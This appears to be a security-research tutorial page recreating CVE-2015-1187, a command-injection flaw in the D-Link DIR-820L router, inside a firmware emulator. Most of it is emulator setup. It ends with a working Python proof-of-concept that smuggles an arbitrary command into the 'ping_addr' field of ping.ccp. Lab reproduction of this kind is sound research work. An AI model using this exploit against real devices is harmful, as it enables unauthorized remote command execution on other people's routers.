Breaking Bits
Search…
What this gitbook is
Vulnerability Discovery
Reverse Engineering
Emulation
Fuzzing with AFL
Automated Vulnerability Discovery
Automatic Exploit Generation
CTF
Spaceheros CTF 2022
UMDCTF 2020
UMDCTF 2022
US CyberGames RE-Cruise 4
Firmware Emulator
Interactive Firmware Emulator Usage
Recreating CVE-2015-1187 in the DIR-820L
Exploit Development
Linux kernel exploit development
Powered By GitBook
Recreating CVE-2015-1187 in the DIR-820L
Adding Cat gifs to the DIR-820L using CVE-2015-1187 with the firmware emulator
We'll be recreating CVE-2015-1187 using the firmware posted on D-Link's website here a direct link to the firmware here. This exploit takes advantage of the DIR-820L at version 1.05.
1
$ wget https://ftp.dlink.ca/ftp/PRODUCTS/DIR-820L/DIR-820L_REVA_FIRMWARE_1.05B03.BIN
Copied!

Setup

We'll be using the Firmware Emulator (help me find a better name please) to emulate this firmware. And so we'll need to clone and install it first.
1
$ git clone https://github.com/ChrisTheCoolHut/firmware_emulator.git
2
$ cd firmware_emulator
3
$ ./install.sh
4
$ sudo apt-get install qemu-system-arm qemu-system-mips qemu-system-x86 qemu-utils kpartx uml-utilities bridge-utils
Copied!
With that, it should be installed, and we pop into the interactive emulator.
1
$ python fw_emulator.py
2
​
3
______ _
4
| ___(_)
5
| |_ _ _ __ _ __ _____ ____ _ _ __ ___
6
| _| | | '__| '_ ` _ \ \ /\ / / _` | '__/ _ \
7
| | | | | | | | | | \ V V / (_| | | | __/
8
\_| |_|_| |_| |_| |_|\_/\_/ \__,_|_| \___|
9
10
11
_____ _ _
12
| ___| | | | |
13
| |__ _ __ ___ _ _| | __ _| |_ ___ _ __
14
| __| '_ ` _ \| | | | |/ _` | __/ _ \| '__|
15
| |__| | | | | | |_| | | (_| | || (_) | |
16
\____/_| |_| |_|\__,_|_|\__,_|\__\___/|_|
17
​
18
​
19
emu:~$
20
emu:~$
21
add_file export info remove_root_passwd unmount
22
add_network force_network make_image run
23
del_file force_tty_login mount setup_network
Copied!
Pressing tab reveals it's list of commands, which are explained here. But we'll just need a couple to emulate this image. The general flow of emulating an image will be using the make_image command followed by a setup_network command. If that flow doesn't work, we'll use the other commands to do some debugging.
1
emu:~$ make_image DIR-820L_REVA_FIRMWARE_1.05B03.BIN
2
INFO:root:Using firmadyne extractor
3
​
4
/home/chris/projects/firmware_emulator/DIR-820L_REVA_FIRMWARE_1.05B03.BIN
5
>> MD5: ec3be072456a275d4eb2f7f851bd18f9
6
>> Tag: DIR-820L_REVA_FIRMWARE_1.05B03.BIN_ec3be072456a275d4eb2f7f851bd18f9
7
>> Temp: /tmp/tmp5r076pun
8
>> Status: Kernel: True, Rootfs: False, Do_Kernel: False, Do_Rootfs: True
9
>> Recursing into archive ...
10
...SNIP...
11
Removing /etc/scripts/sys_resetbutton!
12
loop deleted : /dev/loop30
13
[+] Image created!
14
emu:~$ setup_network
15
DEBUG:root:Getting network information
16
DEBUG:root:Getting serial from 60 second run
17
DEBUG:root:['qemu-system-mips', '-M', 'malta', '-net', 'nic,vlan=0', '-net', 'socket,vlan=0,listen=:2000', '-net', 'nic,vlan=1', '-net', 'socket,vlan=0,listen=:2001', '-net', 'nic,vlan=2', '-net', 'socket,vlan=0,listen=:2002', '-net', 'nic,vlan=3', '-net', 'socket,vlan=0,listen=:2003', '-kernel', '/home/chris/projects/firmware_emulator/binaries/vmlinux.mips', '-drive', 'if=ide,format=raw,file=/tmp/tmppz7bmn12/image.raw', '-append', 'firmadyne.syscall=1 root=/dev/sda1 console=ttyS0 nandsim.parts=64,64,64,64,64,64,64,64,64,64 rdinit=/firmadyne/preInit.sh rw debug ignore_loglevel print-fatal-signals=1', '-m', '1024', '-serial', 'file:/tmp/tmppz7bmn12/qemu.initial.serial.log', '-serial', 'unix:/tmp/tmppz7bmn12/serial.S1,server,nowait', '-monitor', 'unix:/tmp/tmppz7bmn12/monitor,server,nowait', '-display', 'none']
18
qemu-system-mips: -net nic,vlan=0: 'vlan' is deprecated. Please use 'netdev' instead.
19
qemu-system-mips: warning: vlan 3 is not connected to host network
20
qemu-system-mips: warning: vlan 2 is not connected to host network
21
qemu-system-mips: warning: vlan 1 is not connected to host network
22
DEBUG:root:done
23
[{'ip': '192.168.0.1', 'host_ip': '192.168.0.2', 'dev': 'eth0', 'vlan': None, 'mac': None, 'tap_dev': 'tap_0', 'host_net_dev': 'tap_0'}]
24
[+] Network is accessible!
25
​
Copied!
We'll need to note down that ip and host_ip information. When we run our emulator next, we'll be able to ping it at it's specified ip. The next step is confirming that we can run it and interact with it, so we'll issue the run command.
1
emu:~$ run
2
INFO:root:Device available on 192.168.0.1
3
DEBUG:root:sudo tunctl -t tap_0 -u root
4
Ctrl A + X to leave
5
Set 'tap_0' persistent and owned by uid 0
6
DEBUG:root:sudo ip link set tap_0 up
7
DEBUG:root:sudo ip addr add 192.168.0.2/24 dev tap_0
8
DEBUG:root:sudo ip route add 192.168.0.1 via 192.168.0.2 dev tap_0
9
DEBUG:root:Press Ctrl+a then x to exit
10
​
Copied!
These emulators tend to get pretty spammy and you'll see lots of messages like the picture below. This is normal and actually means it's running correctly!

Connecting to the device

We noted down the IP earlier being 192.168.0.1 , so our first step is make sure that it's network reachable:
1
ping 192.168.0.1
2
PING 192.168.0.1 (192.168.0.1) 56(84) bytes of data.
3
64 bytes from 192.168.0.1: icmp_seq=1 ttl=64 time=3.32 ms
4
64 bytes from 192.168.0.1: icmp_seq=2 ttl=64 time=0.379 ms
Copied!
At this point you can actually browse to the site at that address too!

Exporting an exploitable image

To stop the emulation you'll need to enter Ctrl+a,x. This will drop you back into the firmware emulator shell. A quick info command shows what information we've got currently captured from this image:
1
emu:~$ info
2
[+] Image Arch : mips
3
[+] Image Endi : Iend_BE
4
[+] Image Path : /tmp/tmppz7bmn12/image.raw
5
[+] Image IP ADDR : ['192.168.0.1']
6
[+] Image Kernel : /home/chris/projects/firmware_emulator/binaries/vmlinux.mips
Copied!
We're going to add an extra binary to the device next. If we were debugging a memory corruption bug, we could add gdbserver, but in this case we'll be adding the binary I want the command injection to run.
1
emu:~$ add_file payloads/arch/mips/cat_payload /cat_payload
2
[+] loop device at /dev/mapper/loop30p1
3
loop deleted : /dev/loop30
4
[+] Added file
Copied!
With our payload added, and networking information known, we can export the router image and use just that for finishing the exploit. I'm exporting my image to the folder DIR_820L_105_emulator and am closing out the firmware emulator.
1
emu:~$ export DIR_820L_105_emulator
2
# Ctrl+D or Ctrl+C to quit
Copied!
Next is going into the directory and starting the emulator!
1
$ cd DIR_820L_105_emulator
2
$ bash runner.sh
Copied!
The description provided by the initial disclosure led me to write the following PoC:
1
#!/usr/bin/env python
2
import requests
3
import argparse
4
​
5
data = 'ccp_act=ping_v6&ping_addr=$({})'
6
​
7
def main():
8
parser = argparse.ArgumentParser()
9
​
10
parser.add_argument("IP")
11
parser.add_argument("Command")
12
​
13
args = parser.parse_args()
14
​
15
t_data = {
16
'ccp_act' : 'ping_v6',
17
'ping_addr' : '$({})'.format(args.Command)
18
}
19
​
20
url = "http://{}/ping.ccp".format(args.IP)
21
​
22
print("Sending request!")
23
resp = requests.post(url= url, data=t_data)
24
​
25
if __name__ == "__main__":
26
main()
27
​
Copied!
Running the exploit with the cat payload starts a new service listening on port 12345 providing anyone with access to the router with free cat gifs!
1
python exploit.py 192.168.0.1 "/cat_payload 12345"
Copied!
Previous
Interactive Firmware Emulator Usage
Next - Exploit Development
Linux kernel exploit development
Last modified 1yr ago
Copy link
Contents
Setup
Connecting to the device
Exporting an exploitable image